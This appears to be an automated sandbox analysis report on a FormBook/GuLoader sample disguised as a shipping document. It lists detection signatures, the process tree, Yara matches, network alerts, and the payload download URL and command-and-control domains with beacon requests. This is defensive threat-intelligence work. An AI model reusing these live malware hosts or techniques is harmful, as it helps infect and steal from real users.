Loading ...

Play interactive tourEdit tour

Analysis Report AWB_&_Shipping Doc.bat

Overview

General Information

Sample Name:AWB_&_Shipping Doc.bat (renamed file extension from bat to exe)
Analysis ID:297924
MD5:6386849f8a478fd08477053700ee3ea3
SHA1:1c8da40fedbdf778bdce0b580ad2dfb34c829ec7
SHA256:1c81f41c9117ff33b9ef73de5b6e429b571bae3393b8ce9bd4f3f28ba48b276b

Most interesting Screenshot:

Detection

FormBook GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Potential malicious icon found
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Generic Dropper
Yara detected GuLoader
Contains functionality to hide a thread from the debugger
Detected RDTSC dummy instruction sequence (likely for instruction hammering)
Hides threads from debuggers
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Yara detected VB6 Downloader Generic
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • AWB_&_Shipping Doc.exe (PID: 7088 cmdline: 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe' MD5: 6386849F8A478FD08477053700EE3EA3)
    • AWB_&_Shipping Doc.exe (PID: 6204 cmdline: 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe' MD5: 6386849F8A478FD08477053700EE3EA3)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • cscript.exe (PID: 1968 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
          • cmd.exe (PID: 6252 cmdline: /c del 'C:\Users\user\Desktop\AWB_&_Shipping Doc.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000B.00000002.471972196.00000000006F8000.00000004.00000020.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
  • 0x86e0:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x18419:$sqlite3step: 68 34 1C 7B E1
    • 0x1852c:$sqlite3step: 68 34 1C 7B E1
    • 0x18448:$sqlite3text: 68 38 2A 90 C5
    • 0x1856d:$sqlite3text: 68 38 2A 90 C5
    • 0x1845b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18583:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.473037289.0000000004BBF000.00000004.00000001.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x8624:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    Click to see the 16 entries

    Sigma Overview

    No Sigma rule has matched

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: AWB_&_Shipping Doc.exeVirustotal: Detection: 11%Perma Link
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORY
    Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop esi11_2_004172F7

    Networking:

    barindex
    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
    Source: TrafficSnort IDS: 2018752 ET TROJAN Generic .bin download from Dotted Quad 192.168.2.3:49720 -> 192.210.146.118:80
    Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49746
    Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49747
    Source: global trafficHTTP traffic detected: GET /u2e/?J6A=fOOvFeCRGZilV5FD1+mHhwrLgezxAS8nC209VBcY21t/5KoEoUJzgkM0WV81yJyaD6Gl&YL3=9rN46F HTTP/1.1Host: www.nacesiti.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /u2e/?J6A=V7ZtMDwObpOpn50+hc8lwEJpQXPQmbRBnH5Le+G+KvZbJWeIncKybJk7aoLw9MwxtSCc&YL3=9rN46F HTTP/1.1Host: www.catearhelmet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: Joe Sandbox ViewIP Address: 23.227.38.64 23.227.38.64
    Source: Joe Sandbox ViewIP Address: 34.102.136.180 34.102.136.180
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
    Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
    Source: global trafficHTTP traffic detected: GET /bin_SQZyzLkAMl175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 192.210.146.118Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /bin_SQZyzLkAMl175.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: 192.210.146.118Cache-Control: no-cache
    Source: global trafficHTTP traffic detected: GET /u2e/?J6A=fOOvFeCRGZilV5FD1+mHhwrLgezxAS8nC209VBcY21t/5KoEoUJzgkM0WV81yJyaD6Gl&YL3=9rN46F HTTP/1.1Host: www.nacesiti.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: global trafficHTTP traffic detected: GET /u2e/?J6A=V7ZtMDwObpOpn50+hc8lwEJpQXPQmbRBnH5Le+G+KvZbJWeIncKybJk7aoLw9MwxtSCc&YL3=9rN46F HTTP/1.1Host: www.catearhelmet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
    Source: unknownDNS traffic detected: queries for: www.nacesiti.com
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297467942.0000000000A42000.00000004.00000020.sdmpString found in binary or memory: http://192.210.146.118/
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297437420.0000000000A17000.00000004.00000020.sdmp, AWB_&_Shipping Doc.exe, 00000001.00000002.297467942.0000000000A42000.00000004.00000020.sdmpString found in binary or memory: http://192.210.146.118/bin_SQZyzLkAMl175.bin
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297437420.0000000000A17000.00000004.00000020.sdmpString found in binary or memory: http://192.210.146.118/bin_SQZyzLkAMl175.binR
    Source: AWB_&_Shipping Doc.exe, 00000001.00000002.297467942.0000000000A42000.00000004.00000020.sdmpString found in binary or memory: http://192.210.146.118/bin_SQZyzLkAMl175.biny
    Source: explorer.exe, 00000003.00000000.275063026.0000000008A3C000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.2794moraga.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.2794moraga.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.2794moraga.com/u2e/www.pinacle.online
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.2794moraga.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.6936399.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.6936399.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.6936399.com/u2e/www.onehealthtaskforce.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.6936399.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.adesignmuseum.net
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.adesignmuseum.net/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.adesignmuseum.net/u2e/www.jsbdistributor.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.adesignmuseum.netReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.ahyqmux.icu
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.ahyqmux.icu/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.ahyqmux.icu/u2e/www.worstcasebestcase.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.ahyqmux.icuReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.baisongke.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.baisongke.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.baisongke.com/u2e/j
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.baisongke.comReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.catearhelmet.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.catearhelmet.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.catearhelmet.com/u2e/www.2794moraga.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.catearhelmet.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.colettesimonepsyd.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.colettesimonepsyd.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.colettesimonepsyd.com/u2e/www.ahyqmux.icu
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.colettesimonepsyd.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.daveadonai.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.daveadonai.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.daveadonai.com/u2e/www.adesignmuseum.net
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.daveadonai.comReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.jsbdistributor.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.jsbdistributor.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.jsbdistributor.com/u2e/www.baisongke.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.jsbdistributor.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.moneysavingexpertmonarch.xyz
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.moneysavingexpertmonarch.xyz/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.moneysavingexpertmonarch.xyz/u2e/www.6936399.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.moneysavingexpertmonarch.xyzReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.nacesiti.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.nacesiti.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.nacesiti.com/u2e/www.catearhelmet.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.nacesiti.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.onehealthtaskforce.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.onehealthtaskforce.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.onehealthtaskforce.com/u2e/www.theselfunknown.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.onehealthtaskforce.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.pinacle.online
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.pinacle.online/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.pinacle.online/u2e/www.moneysavingexpertmonarch.xyz
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.pinacle.onlineReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.severbroke.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.severbroke.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.severbroke.com/u2e/www.colettesimonepsyd.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.severbroke.comReferer:
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.theselfunknown.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.theselfunknown.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.theselfunknown.com/u2e/www.severbroke.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.theselfunknown.comReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.worstcasebestcase.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.worstcasebestcase.com/u2e/
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.worstcasebestcase.com/u2e/www.daveadonai.com
    Source: explorer.exe, 00000003.00000002.472199490.0000000001438000.00000004.00000020.sdmpString found in binary or memory: http://www.worstcasebestcase.comReferer:
    Source: explorer.exe, 00000003.00000000.275125048.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn

    E-Banking Fraud:

    barindex
    Yara detected FormBookShow sources
    Source: Yara matchFile source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara matchFile source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    barindex
    Malicious sample detected (through community Yara rule)Show sources
    Source: 0000000B.00000002.471972196.00000000006F8000.00000004.00000020.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.297059643.00000000000A0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.473037289.0000000004BBF000.00000004.00000001.sdmp, type: MEMORYMatched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000001.00000002.297573131.0000000002410000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.471898186.0000000000660000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.471344257.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000000B.00000002.471839232.0000000000630000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Potential malicious icon foundShow sources
    Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189660 NtAllocateVirtualMemory,LdrInitializeThunk,1_2_1E189660
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1896E0 NtFreeVirtualMemory,LdrInitializeThunk,1_2_1E1896E0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189710 NtQueryInformationToken,LdrInitializeThunk,1_2_1E189710
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189780 NtMapViewOfSection,LdrInitializeThunk,1_2_1E189780
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1897A0 NtUnmapViewOfSection,LdrInitializeThunk,1_2_1E1897A0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189540 NtReadFile,LdrInitializeThunk,1_2_1E189540
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1895D0 NtClose,LdrInitializeThunk,1_2_1E1895D0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189A00 NtProtectVirtualMemory,LdrInitializeThunk,1_2_1E189A00
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189A20 NtResumeThread,LdrInitializeThunk,1_2_1E189A20
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189A50 NtCreateFile,LdrInitializeThunk,1_2_1E189A50
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189840 NtDelayExecution,LdrInitializeThunk,1_2_1E189840
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189860 NtQuerySystemInformation,LdrInitializeThunk,1_2_1E189860
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1898F0 NtReadVirtualMemory,LdrInitializeThunk,1_2_1E1898F0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189910 NtAdjustPrivilegesToken,LdrInitializeThunk,1_2_1E189910
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1899A0 NtCreateSection,LdrInitializeThunk,1_2_1E1899A0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189610 NtEnumerateValueKey,1_2_1E189610
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189650 NtQueryValueKey,1_2_1E189650
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189670 NtQueryInformationProcess,1_2_1E189670
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1896D0 NtCreateKey,1_2_1E1896D0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E18A710 NtOpenProcessToken,1_2_1E18A710
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189730 NtQueryVirtualMemory,1_2_1E189730
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E18A770 NtOpenThread,1_2_1E18A770
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189770 NtSetInformationFile,1_2_1E189770
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189760 NtOpenProcess,1_2_1E189760
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189FE0 NtCreateMutant,1_2_1E189FE0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E18AD30 NtSetContextThread,1_2_1E18AD30
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189520 NtWaitForSingleObject,1_2_1E189520
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189560 NtWriteFile,1_2_1E189560
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E1895F0 NtQueryInformationFile,1_2_1E1895F0
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189A10 NtQuerySection,1_2_1E189A10
    Source: C:\Users\user\Desktop\AWB_&_Shipping Doc.exeCode function: 1_2_1E189A80 NtOpenDirectoryObject,1_2_1E189A80
